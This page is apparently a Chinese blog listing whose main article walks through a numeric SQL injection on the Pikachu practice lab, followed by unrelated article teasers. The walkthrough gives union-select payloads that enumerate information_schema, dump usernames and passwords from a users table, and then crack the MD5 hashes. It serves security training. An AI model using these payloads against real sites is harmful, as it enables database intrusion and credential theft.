news 2026/6/10 18:39:26

皮卡丘靶场实战--数字型sql注入

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
皮卡丘靶场实战--数字型sql注入

题目

上图可以看出所在url没有变化,猜测是GET请求方法

1.使用burpsuite进行抓包

在第10行可以看出数据的提交方式,将数据发送到重放器中

(1)确定字段数 id=1 order by [1,2,3....]

依次测试,验证数据库的字段数,可知字段数为2

(2)按照库->表->列的顺序,依次爆破

id=-1 union select 1,database() 发现库的名字是pikachu

输入id=-1 union select 1,table_name from information_schema.tables where table_schema='pikachu' ,存在名为users的表格

输入id=-1 union select 1,column_name from information_schema.columns where table_name='users 找到对应的列名

(3)最后根据得到的信息进行爆破即可

id=-1 unoin select username,password from users

将得到的密码进行MD5解码,得到123456,000000,abc123

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 14:54:10

Open-AutoGLM实战评测:3大核心功能让零代码AI建模成为现实

第一章:Open-AutoGLM 使用体验Open-AutoGLM 是一款面向自动化自然语言处理任务的开源大语言模型工具,专为开发者和研究人员设计,支持快速部署、灵活调用与高效推理。其核心优势在于结合了 GLM 架构的强大语义理解能力与自动化任务调度机制&am…

作者头像 李华
网站建设 2026/6/10 14:52:56

终极指南:使用onoff轻松玩转Node.js硬件编程

终极指南:使用onoff轻松玩转Node.js硬件编程 【免费下载链接】onoff GPIO access and interrupt detection with Node.js 项目地址: https://gitcode.com/gh_mirrors/on/onoff 在物联网技术蓬勃发展的今天,将软件编程与硬件控制相结合已成为开发者…

作者头像 李华
网站建设 2026/6/10 9:43:38

审计日志留存:满足GDPR等数据合规要求

审计日志留存:满足GDPR等数据合规要求 在金融风控系统的一次例行审计中,监管机构提出一个看似简单却极具挑战的问题:“请提供过去六个月中,所有对反欺诈模型进行训练的操作记录,包括操作人、时间、输入数据版本和参数变…

作者头像 李华
网站建设 2026/6/10 14:54:38

2025年PS2模拟器完整教程:轻松配置畅玩经典游戏

2025年PS2模拟器完整教程:轻松配置畅玩经典游戏 【免费下载链接】pcsx2 PCSX2 - The Playstation 2 Emulator 项目地址: https://gitcode.com/GitHub_Trending/pc/pcsx2 想要在电脑上重温《最终幻想X》、《战神》等PS2经典游戏?PCSX2模拟器让你梦…

作者头像 李华
网站建设 2026/6/9 20:57:47

Colorbox实战指南:3步打造专业级图片展示体验

Colorbox实战指南:3步打造专业级图片展示体验 【免费下载链接】colorbox A light-weight, customizable lightbox plugin for jQuery 项目地址: https://gitcode.com/gh_mirrors/co/colorbox 还在为网站图片展示效果平平无奇而烦恼吗?每次点击图片…

作者头像 李华